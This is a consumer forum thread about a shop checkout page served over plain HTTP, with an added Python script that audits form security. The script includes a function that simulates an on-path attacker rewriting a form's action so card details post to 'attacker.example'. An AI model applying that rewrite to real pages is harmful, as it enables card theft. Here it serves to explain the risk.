Online shopping: Padlock missing from page 2/2

kimmage

Hi there,

I went to purchase software online from a reputable company here in Ireland.

I got to the checkout stage, page one was personal details and was https, but page two (credit card info, expiry etc) was http and no padlock.

I sent an email to them asking whether or not this was a fault and they replied saying they use SSL and all pages are encrypted.

I don't believe that all pages are, especially page two of the checkout, the most important page if you ask me.

Is this correct? Should I be seeing a padlock and HTTPS on every page or are they correct saying page one having HTTPS and a padlock covered the entire transaction?

With all the online scams I don't want to risk this by chancing it, although they said unless I buy online I can't shop there...
 
If the page is properly secure you should see a padlock. There are cases, however, when you use other security methods (like that in versions of Actinic) where you won't see the regular browser padlock but they have a separate warning/security reassurance because parts of the page are using the rarely used Secure HTTP. It is not the accepted standard like the padlock, so proceed with caution.

HTTP pages are unsecure, whereas HTTPS (S = secure) pages are secure provided that the certificate attached to the HTTPS page is also valid.
If you are unhappy with the site security and what the owners are telling you then never risk it.

Is the product not available elsewhere?
 
Thanks for the reply Woodie.

I think I will have to look for it somewhere else, it's just Office for Mac. I was buying it through the site because the college have an agreement with the shop for academic discounts. We were told by the IT dept to use that supplier. I don't know if I can mention them here?

I don't think I will risk it, it's definitely not showing me HTTP(S) on the credit card page, it changes from S to normal HTTP when I click page 2.

I wish they allowed PayPal or something, at least their own page opens and it's usually always secure.

Thanks for the reply and explaining the HTTPS thing, I wanted to make sure I wasn't being over cautious.
 
Why not query it with the site ?
If their security is flawed and they are unaware, one would hope they would appreciate the info.
 
The form page that you fill in can be unsecure (HTTP) but the target page/URL to which the data is sent can be secure (HTTPS) and this is not a security problem per se. But many people expect even the form page to be secure.
 
The form page that you fill in can be unsecure (HTTP) but the target page/URL to which the data is sent can be secure (HTTPS) and this is not a security problem per se. But many people expect even the form page to be secure.

Unless someone sets up a MITM or browser-jacking session which captures all that data in unencrypted format.
Then there is an unnecessary exposure of sensitive data.

However, in my opinion for most hackers it is much easier to get access to data direct from hosted databases using techniques such as SQLi than it is to target an individual, hoping they will enter some sensitive data.

I do quite a bit of work in online security and it is hard to believe how some web developers manage to get away with the coding techniques they use to deliver websites to businesses/customers.

It is also even harder to believe the attitudes that website users have in relation to their own online identities. I would make a pretty good guess that 65-70% of users register on a forum/online store/wherever with their primary email address and the same password as their email. It's a pretty simple process to harvest these email / passwords from unsecure sites and then use them to access personal email accounts.

That's just for starters .....
 
Unless someone sets up a MITM or browser-jacking session which captures all that data in unencrypted format.
Then there is an unnecessary exposure of sensitive data.
There's no sensitive data sent in the clear in the scenario that I outlined above. The user gets the form via an unsecure (sic.?) link, fills in the data via their browser and this (possibly sensitive data) gets submitted via a secure link. Obviously there are other risks such as keylogging etc. but that is not the focus of this thread.
 

I'm intrigued. Can you explain further please about where the encryption happens ?
 
I don't think that anybody should use that method. Better to secure both the URL from which the form is retrieved and also the URL to which the data is sent even if the former may be somewhat redundant subject to caveats such as you and that link mention...
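The disagreement above comes down to one question: does it matter that the checkout form itself was served over HTTP if it posts to an HTTPS URL? The script below is an added example, not code from the thread or from the shop, that makes the answer concrete. It parses the forms out of a page, resolves where each one submits, and flags three things: a form page served over plain HTTP, a submit URL that is not HTTPS, and a GET method. It then simulates what an on-path attacker can do to a page that arrived unencrypted, namely rewrite the form's action so the card details go to a host of the attacker's choosing, and audits the page again. All URLs, the HTML and the attacker host name are constructed for the example; only the Python standard library is used.

```python
"""Audit checkout forms: is the page secure, and is the place it submits to secure?

Added example for the discussion above; not the shop's or the forum's own code.
The sample page, URLs and attacker host are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect each <form>'s action, method and the names of its fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "fields": []}
        elif tag in ("input", "select", "textarea") and self._form is not None:
            if a.get("name"):
                self._form["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def audit_forms(page_url, html):
    """Return one dict per form: resolved action URL, method, fields, problems."""
    collector = FormCollector()
    collector.feed(html)
    page_scheme = urlsplit(page_url).scheme
    report = []
    for form in collector.forms:
        # A relative action (e.g. "/pay") inherits the scheme of the page it sits on.
        action = urljoin(page_url, form["action"])
        action_scheme = urlsplit(action).scheme
        problems = []
        if page_scheme != "https":
            problems.append("form page served over %s: anyone on the path can alter "
                            "the form, including its action, before the browser shows it"
                            % page_scheme)
        if action_scheme != "https":
            problems.append("form submits over %s: field values travel in the clear"
                            % action_scheme)
        if form["method"] != "post":
            problems.append("method %s: values end up in the URL, server logs and "
                            "Referer headers" % form["method"].upper())
        report.append({"action": action, "method": form["method"],
                       "fields": form["fields"], "problems": problems})
    return report


def rewrite_form_actions(html, attacker_host):
    """Simulate an on-path attacker editing a page that arrived over plain HTTP.

    Nothing authenticates an HTTP page, so the browser cannot tell that the
    HTTPS action was swapped for the attacker's own collector URL.
    """
    return re.sub(r'action="https://[^"]*"',
                  'action="http://%s/collect"' % attacker_host, html)


# Constructed sample: checkout page 2 as described in the thread, served over
# HTTP but posting to an HTTPS endpoint. Hostnames are made up.
PAGE_URL = "http://shop.example/checkout/step2"
PAGE_HTML = """
<html><body>
<form method="post" action="https://secure.shop.example/pay">
  <input name="card_number"> <input name="expiry"> <input name="cvv">
  <input type="submit" value="Pay">
</form>
</body></html>
"""


def demo():
    """Audit the page as served, then after an on-path rewrite of its action."""
    as_served = audit_forms(PAGE_URL, PAGE_HTML)
    tampered = audit_forms(PAGE_URL, rewrite_form_actions(PAGE_HTML, "attacker.example"))
    return as_served, tampered


if __name__ == "__main__":
    for label, report in zip(("as served", "after on-path rewrite"), demo()):
        for form in report:
            print(label, "->", form["action"], form["fields"])
            for problem in form["problems"]:
                print("   !", problem)
```

Run as is, the first audit shows the thread's exact situation: the submit URL is HTTPS and the card fields would be encrypted in transit, but the page that carries the form was not, so the single finding is that the form could have been altered on its way to you. The second audit shows the consequence: once the action has been rewritten, the same form posts the card number, expiry and CVV over plain HTTP to a host that is not the shop. Serving the page over HTTPS, which is what the poster asked the shop for, is what prevents the rewrite in the first place.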
 

Cool - thanks CM.

I was just afraid there was an uber-funky way of doing this that I haven't come across.
 
Just wanted to give a quick update here. The site acknowledged the padlock was missing from page 2 and it has now been fixed.

The entire process is secure.

Thanks to everyone for their input. I know it's probably very low risk or none at all, but still I wouldn't like to have thousands or that charged to me and then claim off the bank or whatever happens when a card is fleeced/skimmed.

Cheers.